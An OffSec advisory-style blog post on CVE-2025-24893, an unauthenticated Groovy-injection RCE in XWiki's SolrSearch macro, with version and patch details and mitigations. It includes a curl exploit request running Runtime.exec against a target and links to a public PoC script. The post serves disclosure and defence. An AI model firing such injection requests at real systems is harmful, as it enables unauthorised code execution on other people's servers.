
Jun 5, 2025
CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
An RCE vulnerability in XWiki was found allowing unauthenticated attackers to execute arbitrary Groovy code remotely without authentication or prior access.
CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source enterprise wiki platform. The flaw resides in how the SolrSearch macro improperly handles Groovy expressions inside search queries. This allows unauthenticated attackers to execute arbitrary Groovy code remotely—without any authentication or prior access.
- CVE ID: CVE-2025-24893
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 92.01% (Very high likelihood of exploitation)
- Published: February 20, 2025
- Affected Versions: All versions prior to 15.10.11, 16.4.1, and 16.5.0RC1
- Patched Versions: 15.10.11, 16.4.1, 16.5.0RC1
XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine. The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.
Attackers can inject Groovy expressions into the search query via a GET request and cause the system to evaluate arbitrary code within the context of the XWiki server process.
Example vulnerable endpoint:
GET /xwiki/bin/view/Main/SolrSearchMacros?search=... (with embedded Groovy code)
This results in direct RCE if the Groovy expression includes system-level commands, such as creating a file or launching a process.
- No authentication required (guest access suffices)
- Publicly exposed XWiki instance
- Affected version in use
- SolrSearch macro available
The root cause is unsafe evaluation of Groovy content inside the SolrSearch macro:
def query = "search=${params.search}" // No sanitization
def result = evaluate(query) // Dangerous use of evaluate()
- Craft Groovy Code Injection
Construct a payload that embeds system commands into the search parameter. - Send GET Request to Macro
curl "http://<target>/xwiki/bin/view/Main/SolrSearchMacros?search=groovy:java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')"
3. Achieve RCE
The injected code is executed, and the attacker gains system-level access on the
XWiki server.
As of now, there’s no official Metasploit module for this CVE, but a working PoC exists on GitHub:
📎 https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
- Upgrade Immediately:
- 15.x users: Upgrade to 15.10.11
- 16.4.x users: Upgrade to 16.4.1
- Others: Use 16.5.0RC1 or newer
- Restrict Guest Access: Disable anonymous guest access to the application wherever possible.
- Use a Web Application Firewall (WAF): Implement filtering to block malicious query parameters.
- Monitor Logs: Look for unusual Groovy expressions in the SolrSearch endpoint access logs.
- GitHub Advisory GHSA-rr6p-3pfg-562j
- NVD Entry – CVE-2025-24893
- Ionix Blog Analysis
- PoC Exploit Script
Click below to access the CVE-2025-24893 lab in our Learning Library. CVE labs are available with a Learn Enterprise account.
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec

Research & Tutorials
CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php
Discover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project ≤ 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.
Jun 26, 2025
2 min read

OffSec News
What It Really Means to “Try Harder”
Discover how OffSec’s “Try Harder” mantra evolved into a mindset, and how it helps learners build grit, creativity, and real-world problem-solving skills.
Jun 23, 2025
7 min read

Research & Tutorials
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
CVE-2025-3248 is a critical RCE vulnerability in Langflow that allows unauthenticated attackers to execute arbitrary Python code via unsanitized input to exec(). Learn how it works and how to protect your system.
Jun 18, 2025
2 min read